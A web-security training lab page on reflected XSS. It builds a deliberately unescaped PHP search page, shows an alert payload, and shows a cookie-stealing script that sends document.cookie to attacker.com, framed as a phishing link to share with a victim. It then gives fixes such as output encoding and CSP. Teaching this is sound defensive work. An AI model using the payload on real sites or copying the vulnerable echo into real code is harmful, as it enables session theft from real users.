Logo Light

Network

Web Apps

System

Cloud

Cryptography

IoT

Exercise 45: Cross-Site Scripting (XSS) – Reflected XSS

by | May 28, 2025 | 0 comments

Objective

Learn how to exploit Reflected Cross-Site Scripting (XSS) vulnerabilities by injecting malicious scripts through URL parameters or user inputs that are immediately reflected in the page response. Understand how to mitigate this vulnerability through input validation, output encoding, and secure coding practices.

Scenario

You are testing a web application with a search feature that directly reflects user input in the page without proper sanitization. This allows an attacker to craft malicious URLs that, when visited by a victim, execute unauthorized scripts in their browser.

Lab Setup

Prerequisites:

  • Basic knowledge of PHP and JavaScript.
  • XAMPP/LAMP/WAMP stack installed (or any web server with PHP support).
  • A code editor (e.g., VSCode, Sublime Text).

Step 1: Create the Vulnerable Web Application

  1. PHP Script for the Search Feature (Vulnerable)
    • Create a file search.php: <?php if (isset($_GET['q'])) { $search = $_GET['q']; echo "<h2>Search Results for: $search</h2>"; } else { echo "<h2>Enter a search term.</h2>"; } ?> <h2>Search</h2> <form method="GET" action=""> <input type="text" name="q" required> <button type="submit">Search</button> </form>
  2. Running the Application
    • Start the Apache server.
    • Place search.php in the web server’s root directory (htdocs for XAMPP).
    • Open http://localhost/search.php in your browser.

Exploitation Steps

Step 1: Injecting Malicious Script via URL

  1. Craft a malicious URL with the following payload: http://localhost/search.php?q=<script>alert('XSS')</script>
  2. Visit the URL in the browser.

Expected Result:

  • The injected script executes, displaying an alert box with the message “XSS”.

Step 2: Creating a Phishing Link

  1. Modify the payload to steal cookies: http://localhost/search.php?q=<script>fetch('http://attacker.com/steal.php?cookie=' + document.cookie)</script>
  2. Share the link with a victim.

Expected Result:

  • The victim’s cookies are sent to the attacker’s server upon clicking the link.

Solution and Prevention

Problem Analysis

  • User input is reflected in the web page without any sanitization or encoding, allowing arbitrary JavaScript execution.

Fixing the Vulnerability

  1. Input Validation
    • Validate input to allow only safe characters: $search = filter_var($_GET['q'], FILTER_SANITIZE_STRING); echo "<h2>Search Results for: $search</h2>";
  2. Output Encoding
    • Encode output to prevent script execution: echo "<h2>Search Results for: " . htmlspecialchars($search, ENT_QUOTES, 'UTF-8') . "</h2>";
  3. Implement Content Security Policy (CSP)
    • Restrict script execution with CSP headers: header("Content-Security-Policy: default-src 'self'; script-src 'self'");
  4. Use Secure JavaScript Libraries
    • Avoid using eval() or dynamic script injections.

Testing After Fix

  1. Attempt to access http://localhost/search.php?q=<script>alert('XSS')</script>.
  2. Expected Result:
    • The input is displayed as text, and the script does not execute.
  3. Try advanced payloads.
  4. Expected Result:
    • All malicious inputs are neutralized or blocked.

Conclusion

In this lab, you exploited a Reflected XSS vulnerability by injecting malicious scripts through URL parameters. You also learned how to prevent this vulnerability through input validation, output encoding, and implementing Content Security Policies (CSP).

0 Comments

Submit a Comment

Your email address will not be published. Required fields are marked *